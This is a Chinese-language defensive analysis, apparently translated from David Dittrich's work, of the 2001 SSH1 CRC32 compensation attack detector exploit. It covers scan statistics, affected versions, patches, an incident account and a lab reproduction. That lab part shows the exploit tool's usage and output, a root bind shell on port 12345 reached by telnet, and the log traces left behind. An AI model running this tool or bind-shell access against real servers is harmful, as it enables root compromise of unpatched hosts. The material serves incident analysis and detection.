对于SSH crc32 compensation attack detector exploit 的分析
/ns/hk/hacker/data/20020807014551.htm
对于SSH crc32 compensation attack detector exploit 的分析
本文出自:http://xfocus.org 作者: xundi@xfocus.org
由于SSH crc32 compensation attack detector exploit代码的流传开来,对于
SSH的扫描也越来越多,这是一份统计报表:
+------------+------------+----------+----------+-----------+
| date | #Probes | #Sources | #Targets | #Scanners |
+------------+------------+----------+----------+-----------+
| 2001-10-03 | 1466 | 45 | 987 | |
| 2001-10-04 | 319 | 25 | 212 | |
| 2001-10-05 | 825 | 22 | 783 | |
| 2001-10-06 | 86552 | 27 | 86305 | |
| 2001-10-07 | 7564 | 29 | 7429 | |
| 2001-10-08 | 2506 | 29 | 2449 | |
| 2001-10-09 | 1010 | 18 | 263 | |
| 2001-10-10 | 480 | 39 | 307 | |
| 2001-10-11 | 978 | 31 | 504 | |
| 2001-10-12 | 436 | 21 | 311 | |
| 2001-10-13 | 6731 | 27 | 6353 | |
| 2001-10-14 | 1411 | 29 | 1084 | |
| 2001-10-15 | 936 | 34 | 723 | |
| 2001-10-16 | 1358 | 40 | 1256 | |
| 2001-10-17 | 1098 | 36 | 899 | |
| 2001-10-18 | 1779 | 31 | 1438 | |
| 2001-10-19 | 19722 | 28 | 19573 | 7 |
| 2001-10-20 | 25539 | 21 | 25419 | 3 |
| 2001-10-21 | 6796 | 26 | 6750 | 9 |
| 2001-10-22 | 807 | 30 | 482 | 5 |
| 2001-10-23 | 578 | 49 | 327 | 6 |
| 2001-10-24 | 2198 | 39 | 2025 | 9 |
| 2001-10-25 | 2368 | 31 | 1759 | 6 |
| 2001-10-26 | 712 | 37 | 591 | 7 |
| 2001-10-27 | 463 | 30 | 297 | 8 |
| 2001-10-28 | 495 | 30 | 263 | 5 |
| 2001-10-29 | 478 | 37 | 399 | 5 |
| 2001-10-30 | 1154 | 48 | 1051 | 5 |
| 2001-10-31 | 1998 | 46 | 1047 | 5 |
| 2001-11-01 | 66660 | 46 | 66386 | 5 |
| 2001-11-02 | 1514 | 40 | 926 | 5 |
| 2001-11-03 | 2142 | 36 | 2047 | 8 |
| 2001-11-04 | 1233 | 26 | 781 | 9 |
+------------+------------+----------+----------+-----------+
鉴于此情况,编译整理David A. Dittrich <dittrich@cac.washington.edu> 文章
(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家参考和修补。
-------------------------------------------------------------------------------
概述
==================
此漏洞最开始由CORE-SDI组织在securityfocus.com上的BUGTRAQ上发布了他们安全
公告CORE-20010207,日期为2001,2月8号:
http://www.securityfocus.com/advisories/3088
漏洞的简单描述就是:ssh1守护程序中所带的一段代码中存在一个整数溢出问题。问题出在
deattack.c,此程序由CORE SDI开发,用来防止SSH1协议受到CRC32补偿攻击。
由于在detect_attack()函数中错误的将一个16位的无符号变量当成了32位变量来使用,
导致表索引溢出问题。
这将允许一个攻击者覆盖内存中的任意位置的内容,攻击者可能远程获取root权限。
其他组织也陆续公布了一些对这个SSH 漏洞的分析和建议如:
http://xforce.iss.net/alerts/advise100.php
http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
http://www.securityfocus.com/bugid=2347
而在2001年10月21号Jay Dyson在incidents@securityfocus.com邮件列表上声明
有不少信息显示有人在扫描RIPE 网络段的SSH服务器:
http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1
然后更甚的是在vuln-dev@securityfocus.com邮件列表中提示Newsbytes.com中
有新闻描述有人愿付$1000美金的人提供此攻击工具。还有没有确认的传闻针对
Solaris 8/SPARC SSH.com 1.2.26-31 系统的攻击代码也存在。著名的安全站点
securitynewsportal.com就被这个漏洞攻击,下面地址是被黑截图:
http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/
最近TESO发布了关于这些攻击代码的信息,你可以在下面的地址查看:
http://www.team-teso.org/sshd_statement.php
下面是受影响的SSH版本:
SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)
SSH Communications Security SSH 1.2.23-1.2.31
F-Secure SSH versions prior to 1.3.11-2
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)
OSSH 1.5.7
不过供应商已经为系统提供补丁信息,大家可以参考如下地址:
http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
http://openssh.org/security.html
http://www.cisco.com/warp/public/707/SSH-multiple-pub.html
---------------------------------------------------------------------------
攻击行为的分析
=====================
2001年10月6日,攻击者从Netherlands网络段使用crc32 compensation attack
detector漏洞攻击程序入侵了一台UW网络中使用了OpenSSH 2.1.1的Redhat linux
系统,漏洞描述如CERT VU#945216所述:
http://www.kb.cert.org/vuls/id/945216
系统中一系列操作系统命令被替换成木马程序以提供以后再次进入并清除了所有
日志系统。第二台SSH服务器运行在39999/tcp高端口,系统入侵后被用来扫描其他
UW以外的网络以获得更多的运行OpenSSH 2.1.1的系统。
通过一些恢复操作对这个漏洞程序进行了分析:
这个攻击代码基于OpenSSH 2.2.0版本(这个是2.1.1之后的版本,对crc32
compensation attack detection function进行了修补),不过针对OpenSSH
2.1.1进行攻击,其攻击代码也可以使用在ssh.com 1.2.31版本(针对其他SSH
协议1 和版本的测试尚无完成)。
攻击代码对针对如下系统:
linux/x86 ssh.com 1.2.26-1.2.31 rhl
linux/x86 openssh 1.2.3 (maybe others)
linux/x86 openssh 2.2.0p1 (maybe others)
freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
虽然这个攻击代码可以对多个平台系统进行攻击,这里攻击者只扫描22/tcp端口,
然后连接这些系统获得响应的版本程序并只对"OpenSSH_2.1.1"继续进一步操作。
这些扫描使用快速SYN扫描,使用来自t0rn root kit中的工具。
对破坏的系统进行分析发现已经有47067个地址被扫描,而在这些地址中,有1244
个主机被鉴别存在此漏洞,攻击者成功的在8月8日系统离线之前利用此漏洞进入
4个主机。
这个攻击者代码对使用访问控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts"
设置) 或者包过滤(如, ipchains, iptables, ipf) 的系统不能正常工作,因为这些
会要求交换Public keys。
-------------------------------------------------------------------------
对攻击者代码实时的分析
============================
此攻击代码在隔离的网络段进行测试,使用了网络地址为10.10.10.0/24,攻击
主机使用了10.10.10.10 而有漏洞的服务主机为 10.10.10.3。
有漏洞的服务主机系统运行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)
的SSH.com的 1.2.31 版本。
而攻击主机运行了Fred Cohen's PLAC[1] (从CD-ROM引导的Linux 2.4.5 系统),
文件使用"nc"(Netcat)[2]拷贝到系统中.
攻击一方再现
=========================
当以没有任何参数运行攻击代码的时候会显示使用信息:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
**please pick a type**
Usage: ./ssh host [options]
Options:
-p port
-b base Base address to start bruteforcing distance, by default 0x1800,
goes as high as 0x10000
-t type
-d debug mode
-o Add this to delta_min
types:
0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
1: linux/x86 openssh 1.2.3 (maybe others)
2: linux/x86 openssh 2.2.0p1 (maybe others)
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
被测试系统在系统端口2222上运行着SSH.com version 1.2.31 (未修补)程序,并
把syslog日志重定向独立的文件sshdx.log.
这里选择了类型type 0和2222 攻击端口:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
...........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
..............^[[A................|////////\\\\!
bruteforced h->ident buff distance: 5bfbed88
trying retloc_delta: 35
....!
found high words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b
......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
这里看来,攻击攻击相似被"停止"了,返回被攻击系统查看却发现被开了后门。
被测试系统一方再现
=======================
在利用漏洞之前,被测试系统显示标准SSH守护程序运行在22/tcp端口,要被
测试的应用程序运行在2222/tcp端口,两个都在监听状态,而且标准SSH守护
程序有一个外部连接(10.10.10.2:33354),通过netstat查看如下:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
而在攻击程序"停止"以后,再用netstat查看网络监听状态如下:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
发现有新的服务在12345/tcp端口监听。
返回攻击者主机,使用netstat查看网络状态,发现程序使用了暴力猜测地址
方式攻击:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
而使用LiSt Open Files ("lsof")[4]工具显示被测试的SSH守护程序开启了一个
新的监听端口:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 9364 root cwd DIR 3,3 1024 2 /
sshd 9364 root rtd DIR 3,3 1024 2 /
sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so
sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so
sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so
sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so
sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so
sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so
sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so
sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so
sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so
sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so
sshd 9364 root 0u CHR 1,3 4110 /dev/null
sshd 9364 root 1u CHR 1,3 4110 /dev/null
sshd 9364 root 2u CHR 1,3 4110 /dev/null
sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)
sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
很明显,攻击程序成功利用此漏洞获得ROOT SHELL,并绑定了一个高端TCP端口。
这样攻击者可以使用任何"telnet"或者"rc"工具连接到此端口并以超级用户的
方式执行任意命令,如下所示:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov 1 18:04:42 PST 2001
netstat -an --inet;
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[注意]:使用telnet要加";"号,而nc连接不需要。
等攻击者退出以后,被测试系统网络状态返回正常:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
如果syslog日志功能开启了,连接和暴力测试的信息全部会记录下来(注意,这个是
对SSH.com 1.2.31在Red Hat LInux 6.0上的测试 -- 日志标志会和记录OpenSSH
不一样):
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307
Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343
Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
